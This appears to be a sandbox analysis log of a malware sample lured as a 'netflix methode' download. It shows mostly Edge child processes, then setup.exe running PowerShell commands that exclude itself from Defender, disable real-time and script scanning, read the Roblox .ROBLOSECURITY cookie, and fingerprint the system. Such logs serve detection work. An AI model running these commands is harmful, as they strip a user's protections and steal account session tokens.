PID 3976 wrote to memory of 964	3976	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/8v0ym9nvwrkeusj/netflix+methode+.rar/file
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff83d7446f8,0x7ff83d744708,0x7ff83d744718
  2⤵
  PID:2276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
  2⤵
  PID:2188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:3168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
  2⤵
  PID:3236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:1360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
  2⤵
  PID:5328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:5540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6340 /prefetch:8
  2⤵
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  2⤵
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4796 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
  2⤵
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
  2⤵
  PID:5520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5048 /prefetch:8
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4776 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
  2⤵
  PID:5268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
  2⤵
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6312 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
  2⤵
  PID:5812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7428 /prefetch:8
  2⤵
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,7372907728559216556,6154756006606776404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7600 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4084

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3048

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultc23eda47h0d51h4772h883chd76fe063bcfb
1⤵
PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff83d7446f8,0x7ff83d744708,0x7ff83d744718
  2⤵
  PID:5544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,16109272432751795183,3176933222891312208,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
  2⤵
  PID:632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,16109272432751795183,3176933222891312208,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
  2⤵
  PID:5564

C:\Windows\System32\SystemSettingsBroker.exe
C:\Windows\System32\SystemSettingsBroker.exe -Embedding
1⤵
PID:1584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5780

C:\Windows\System32\ATBroker.exe
C:\Windows\System32\ATBroker.exe /start osk
1⤵
PID:4556
- C:\Windows\System32\osk.exe
  "C:\Windows\System32\osk.exe"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:4696

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x404
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:876

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\accounts (1).txt
1⤵
PID:1600

C:\Users\Admin\Downloads\setup.exe
"C:\Users\Admin\Downloads\setup.exe"
1⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:1120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2280
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5636
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4584

C:\Users\Admin\Downloads\setup.exe
"C:\Users\Admin\Downloads\setup.exe"
1⤵
- Executes dropped EXE
- NTFS ADS
PID:1652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3916
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5992
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5600
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4572
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5744

C:\Users\Admin\Downloads\setup.exe
"C:\Users\Admin\Downloads\setup.exe"
1⤵
- Executes dropped EXE
- NTFS ADS
PID:1612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\setup.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:920
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:2248
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:2484
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4328
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5220

